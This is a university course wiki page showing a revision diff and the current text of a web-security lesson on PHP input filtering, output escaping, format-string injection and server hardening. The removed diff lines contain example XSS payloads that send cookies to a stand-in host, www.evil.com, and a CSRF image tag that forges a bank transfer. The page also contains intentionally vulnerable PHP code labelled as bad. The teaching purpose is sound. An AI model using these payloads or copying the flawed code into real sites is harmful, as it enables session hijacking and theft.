Difference between revisions of "Web Application Security, Part 1"

From CSE330 Wiki
Jump to navigationJump to search
 
(53 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
Application-level web security is of increasing concern among web developers.  This article outlines some types of security threats to your web application and how to solve those threats.
 
Application-level web security is of increasing concern among web developers.  This article outlines some types of security threats to your web application and how to solve those threats.
  
This is Part 1 of the Web Application Security article, geared toward the material covered in [[Module 2]].  For material covered in [[Module 3]] (MySQL), see [[Web Application Security, Part 2]].  For material covered in [[Module 4]] (JavaScript), see [[Web Application Security, Part 3]].
+
This is Part 1 of the Web Application Security article, geared toward the material covered in [[Module 2]].  For material covered in [[Module 3]] (MySQL), see [[Web Application Security, Part 2]].  For material covered in [[Module 6]] (JavaScript), see [[Web Application Security, Part 3]].
  
 
== Introduction to Application-Level Web Security ==
 
== Introduction to Application-Level Web Security ==
Line 7: Line 7:
 
Every day, computer hackers around the world penetrate web applications, often for personal profits.  You may find it hard to believe, but '''even high-profile web sites (banks, social media, even computer security companies) are vulnerable to application-level attacks!'''
 
Every day, computer hackers around the world penetrate web applications, often for personal profits.  You may find it hard to believe, but '''even high-profile web sites (banks, social media, even computer security companies) are vulnerable to application-level attacks!'''
  
Not only is it embarrassing to be "the one" who wrote the vulnerable code, but it could also cost you your job.  As a prudent web developer, it's ''imperative'' that you take precautionary measures to make your application difficult to penetrate.  Indeed, most of the time, if your site is well-written, hackers will just move on.
+
Not only is it embarrassing to be the programmer who wrote the vulnerable code, but it could also cost you your job.  As a prudent web developer, it is ''imperative'' that you take precautionary measures to make your application difficult to penetrate.  Indeed, most of the time, if your site is well-written, hackers will just move on.
  
 
Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector.  '''NEVER TRUST USER INPUT!!!'''  This can be summarized in the acronym FIEO, or ''Filter Input, Escape Output''.
 
Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector.  '''NEVER TRUST USER INPUT!!!'''  This can be summarized in the acronym FIEO, or ''Filter Input, Escape Output''.
  
== Cross-Site Scripting ==
+
=== FIEO in PHP ===
  
TODO: Move this to Part 3.
+
==== Filtering Input ====
  
Cross-Site Scripting, or '''XSS''', is when an attacker targets an area of your application in which user-supplied input is included in application outputThe attacker may use JavaScript to read confidential information and send it to his/her own servers.
+
"Filter Input" means that you should check that input data is of the format that you are expecting.  For example, if you are expecting a number, you should cast it to a float or an intIf you are expecting a phone number, you should run it through a regular expression (you will learn regular expressions in module 4). For example:
  
There are two types of XSS attacks: '''persistent''' and '''reflected'''.
+
<source lang="PHP">
 +
<?php
 +
// Cast a number to a float or an int:
 +
$amount = (float) $_POST['amount'];
  
=== Persistent XSS ===
+
// Pass a phone number through a regular expression:
 +
$phone = preg_match('/\d{3}-\d{3}-\d{4}/', $_POST['phone']) ? $_POST['phone'] : "";
 +
?>
 +
</source>
  
''Persistent XSS'' occurs when a web site stores input in a database and displays it to victims later.  A common vector for Persistent XSS are forum posts or shoutboxes.
+
==== Escaping Output ====
  
For example, consider this code:
+
"Escape Output" means that you need to nullify, or ''escape'', characters that have special meaning in the markup language of interest.  For example, consider the following string:
  
<source lang="php">
+
<source lang="html4strict">
<?php
+
If a<b and b<c then a<c.
 
+
</source>
$res = $mysqli->query("SELECT * FROM shoutbox ORDER BY created_at DESC LIMIT 5");
 
  
while($row=$res->fetch_assoc()){
+
Since a less-than sign means the start of a tag in HTML, and '''b''' is a valid tag name, the above string will ''not'' render as you might expect in HTML. Therefore, we need to ''escape'' our less-than signs by using HTML entities:
echo "<p>".$row["content"]."</p>\n";
 
}
 
  
?>
+
<source lang="html4strict">
 +
If a&lt;b and b&lt;c then a&lt;c.
 
</source>
 
</source>
  
In this example, content from the database is displayed ''verbatim'' to the end user.  This is vulnerable to a Persistent XSS attackSuppose the attacker typed the following code into the shoutbox:
+
The "&lt;" is an '''HTML entity''' that will render as a less-than sign(For more information on HTML entities,
 
+
[https://webplatform.github.io/docs/html/entities read this article on the WebPlatform wiki].)
<nowiki>How 'bout them Cardinals! <script> new Image().src = "http://www.evil.com/record_cookie?"+document.cookie; </script></nowiki>
 
 
 
The victim would just see "How 'bout them Cardinals!", and everything would seem fine.  However, the shout is also executing JavaScript code that sends the contents of the victim's cookies on your site to the attacker!  The attacker can now hijack the victim's session and do bad things.
 
  
To solve this problem, you need to escape the output. In PHP, you can do this using the <code>htmlentities()</code> function:
+
PHP provides a function that, given a string, will convert special characters to their HTML entity equivalents.
  
<source lang="php">
+
<source lang="PHP">
 
<?php
 
<?php
 +
$str = "If a<b and b<c then a<c.";
  
$res = $mysqli->query("SELECT * FROM shoutbox ORDER BY created_at DESC LIMIT 5");
+
// Convert special characters to HTML entities before outputting:
 
+
echo htmlentities($str);
while($row=$res->fetch_assoc()){
 
$safe = htmlentities($row["content"]);
 
echo "<p>".$safe."</p>\n";
 
}
 
 
 
 
?>
 
?>
 
</source>
 
</source>
  
Now, the script would appear as text to the user, and it will not executeThis Persistent XSS threat has been put to rest!
+
'''Note:''' ''htmlentities'' escapes a string for use in HTML, but it does ''not'' escape a string for use in other markup languagesYou need to use different methods when escaping strings for other languages.
  
=== Reflected XSS ===
+
=== Why Not to Escape Input ===
  
Reflected XSS is when a web page accepts input and then displays it immediately as output (without the database intermediate)A common vector for Reflected XSS attacks are search queries.
+
Filtering your input is important, as shown aboveHowever, it is bad practice to ''escape'' your input. For example, don't do this:
  
For example, consider the code:
+
<source lang="PHP">
 
 
<source lang="php"><nowiki>
 
 
<?php
 
<?php
 
+
$message = htmlentites($_POST['amount']); // bad practice
echo "<h1>Transaction History for: " . $_GET['username'] . "</h1>\n";
+
// then store $message in a database, etc.
 
 
 
?>
 
?>
</nowiki></source>
+
</source>
  
This is vulnerable to a Reflected XSS attack. The attacker could trick the victim into visiting this link:
+
The reason this is bad practice is that it permanently ties that string to its final output format.  For example, what if some time down the road you want to support display of that message in a PDF? You'd need to go back and remove all the HTML entities again.
  
<nowiki>http://www.bank.com/history.php?username=mothergoose+%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2Fwww.evil.com%2Frecord_cookie%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E</nowiki>
+
This is why you should ''filter'' strings at the input stage but not ''escape'' them until the final output stage.
  
In some ways, this is more mysterious than Persistent XSS, because it's not clear what's going on.  But this is the code that will be displayed on the page:
+
== Format String Injection ==
  
<nowiki><h1>Transaction History for: mothergoose <script>new Image().src="http://www.evil.com/record_cookie?"+document.cookie;</script></h1></nowiki>
+
If you like using functions like '''printf''' and '''sprintf''', you may find yourself writing
  
Aye yie yie!  To fix this, we again need to escape output:
+
<source lang="php">
 +
printf( "%s", htmlentities($_GET['username']) ); // good example
 +
</source>
  
<source lang="php"><nowiki>
+
It is tempting to reduce this to
<?php
 
  
$safe_username = htmlentities($_GET['username']);
+
<source lang="php">
 +
printf( htmlentities($_GET['username']) ); // BAD example
 +
</source>
  
echo "<h1>Transaction History for: " . $safe_username . "</h1>\n";
+
Although the second implementation will work for most usernames, it is '''''not''''' correct!  You are essentially making the client-provided username the ''format string'' for printf.  If the username contains any percentage sign (%), it will be interpreted as the start of a parameter in the format string, causing your script to return errors. Worse yet, it is known that certain combinations of format parameters will actually reveal system information in the error log.
  
?>
+
=== Solution ===
</nowiki></source>
 
  
And now our Reflected XSS vulnerability has been put to rest.
+
The solution is simple: never put dynamic input as the format string.  It should always be static, either hard-coded or from a stable source like a YAML file.  User-supplied input should ''always'' be fed into the string as arguments to sprintf and printf.
  
=== Real-Life Examples ===
+
If you are outputting only one little string like in the example above, it suffices to use a PHP function like '''print''' or '''echo''':
  
* [http://www.xssed.com/news/130/F-Secure_McAfee_and_Symantec_websites_again_XSSed/ F-Secure, McAfee, and Symantec, January 2012] (Reflected XSS)
+
<source lang="php">
* [http://www.h-online.com/security/news/item/Potential-account-theft-with-XSS-hole-in-eBay-de-1320908.html eBay Germany, August 2011] (Reflected XSS)
+
print htmlentities($_GET['username']); // good example
* [http://news.softpedia.com/news/eBay-and-PayPal-XSSed-Again-159733.shtml PayPal, October 2010] (Reflected XSS)
+
echo htmlentities($_GET['username']); // good example
* [http://news.softpedia.com/news/XSS-Flaw-Found-on-Secure-American-Express-Site-159439.shtml American Express, October 2010] (Reflected XSS)
+
</source>
* [http://threatpost.com/en_us/blogs/persistent-xss-bug-twitter-being-exploited-092110 Twitter, September 2010] (Persistent XSS)
 
 
 
== Cross-Site Request Forgery ==
 
 
 
A cross-site request forgery involves a victim, who is logged in to the targeted site, visiting an attacker’s site.  The attacker has code on his site that forces the victim to unwittingly perform actions on the targeted site.
 
  
For example, suppose Mother Goose visited Dr. Evil's blog.  Dr. Evil had the following tag embedded in his bloc:
+
== Server Configurations ==
  
  <nowiki><img src="http://www.bank.com/transfer.php?dest=dr-evil&amp;amount=5000" /></nowiki>
+
Sometimes hackers attempt to penetrate your application from the server side rather than the application side. Server-side security is beyond the realm of this course, but here are some things you should keep in mind.
  
Worse yet, Dr. Evil could just send an e-mail to Mother Goose with this image tagAll Mother Goose would need to do to be attacked is open the e-mail! (Now you know why sometimes your e-mail client turns off images from suspicious sources.)
+
* Use a highly secure root password, and it should be one that you don't use anywhere else. Seriously.
 +
* Use a firewall system to block unnecessary ports from public accessSSH and Web Server should really be the only ports you need. You should keep the web serve on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.
  
=== Real-Life Examples ===
+
=== Git Exposed ===
  
* [http://www.zdnet.com/no-data-breach-in-first-weibo-attack-2062301014/ Weibo (the Chinese Twitter), June 2011]
+
Another thing to keep in mind is that by default, Apache serves up ''everything'' in your file tree, only except for Apache-specific configuration files like .htaccess.  This means that if you're not careful, your .git directory can be served, exposing attackers to your raw source code, including things like database passwords! A recent study found that [http://www.jamiembrown.com/blog/one-in-every-600-websites-has-git-exposed/ one in every 600 web sites is making this mistake]. Don't be one of them!
* [http://www.huffingtonpost.com/huff-wires/20110601/us-tec-google-hacking-attack/ Gmail, June 2011]
 
  
  
 
[[Category:Module 2]]
 
[[Category:Module 2]]
 +
[[Category:Web Application Security]]

Latest revision as of 21:05, 18 July 2018

Application-level web security is of increasing concern among web developers. This article outlines some types of security threats to your web application and how to solve those threats.

This is Part 1 of the Web Application Security article, geared toward the material covered in Module 2. For material covered in Module 3 (MySQL), see Web Application Security, Part 2. For material covered in Module 6 (JavaScript), see Web Application Security, Part 3.

Introduction to Application-Level Web Security

Every day, computer hackers around the world penetrate web applications, often for personal profits. You may find it hard to believe, but even high-profile web sites (banks, social media, even computer security companies) are vulnerable to application-level attacks!

Not only is it embarrassing to be the programmer who wrote the vulnerable code, but it could also cost you your job. As a prudent web developer, it is imperative that you take precautionary measures to make your application difficult to penetrate. Indeed, most of the time, if your site is well-written, hackers will just move on.

Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector. NEVER TRUST USER INPUT!!! This can be summarized in the acronym FIEO, or Filter Input, Escape Output.

FIEO in PHP

Filtering Input

"Filter Input" means that you should check that input data is of the format that you are expecting. For example, if you are expecting a number, you should cast it to a float or an int. If you are expecting a phone number, you should run it through a regular expression (you will learn regular expressions in module 4). For example:

<?php
// Cast a number to a float or an int:
$amount = (float) $_POST['amount'];

// Pass a phone number through a regular expression:
$phone = preg_match('/\d{3}-\d{3}-\d{4}/', $_POST['phone']) ? $_POST['phone'] : "";
?>

Escaping Output

"Escape Output" means that you need to nullify, or escape, characters that have special meaning in the markup language of interest. For example, consider the following string:

If a<b and b<c then a<c.

Since a less-than sign means the start of a tag in HTML, and b is a valid tag name, the above string will not render as you might expect in HTML. Therefore, we need to escape our less-than signs by using HTML entities:

If a&lt;b and b&lt;c then a&lt;c.

The "<" is an HTML entity that will render as a less-than sign. (For more information on HTML entities, read this article on the WebPlatform wiki.)

PHP provides a function that, given a string, will convert special characters to their HTML entity equivalents.

<?php
$str = "If a<b and b<c then a<c.";

// Convert special characters to HTML entities before outputting:
echo htmlentities($str);
?>

Note: htmlentities escapes a string for use in HTML, but it does not escape a string for use in other markup languages. You need to use different methods when escaping strings for other languages.

Why Not to Escape Input

Filtering your input is important, as shown above. However, it is bad practice to escape your input. For example, don't do this:

<?php
$message = htmlentites($_POST['amount']); // bad practice
// then store $message in a database, etc.
?>

The reason this is bad practice is that it permanently ties that string to its final output format. For example, what if some time down the road you want to support display of that message in a PDF? You'd need to go back and remove all the HTML entities again.

This is why you should filter strings at the input stage but not escape them until the final output stage.

Format String Injection

If you like using functions like printf and sprintf, you may find yourself writing

printf( "%s", htmlentities($_GET['username']) ); // good example

It is tempting to reduce this to

printf( htmlentities($_GET['username']) ); // BAD example

Although the second implementation will work for most usernames, it is not correct! You are essentially making the client-provided username the format string for printf. If the username contains any percentage sign (%), it will be interpreted as the start of a parameter in the format string, causing your script to return errors. Worse yet, it is known that certain combinations of format parameters will actually reveal system information in the error log.

Solution

The solution is simple: never put dynamic input as the format string. It should always be static, either hard-coded or from a stable source like a YAML file. User-supplied input should always be fed into the string as arguments to sprintf and printf.

If you are outputting only one little string like in the example above, it suffices to use a PHP function like print or echo:

print htmlentities($_GET['username']); // good example
echo htmlentities($_GET['username']); // good example

Server Configurations

Sometimes hackers attempt to penetrate your application from the server side rather than the application side. Server-side security is beyond the realm of this course, but here are some things you should keep in mind.

  • Use a highly secure root password, and it should be one that you don't use anywhere else. Seriously.
  • Use a firewall system to block unnecessary ports from public access. SSH and Web Server should really be the only ports you need. You should keep the web serve on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.

Git Exposed

Another thing to keep in mind is that by default, Apache serves up everything in your file tree, only except for Apache-specific configuration files like .htaccess. This means that if you're not careful, your .git directory can be served, exposing attackers to your raw source code, including things like database passwords! A recent study found that one in every 600 web sites is making this mistake. Don't be one of them!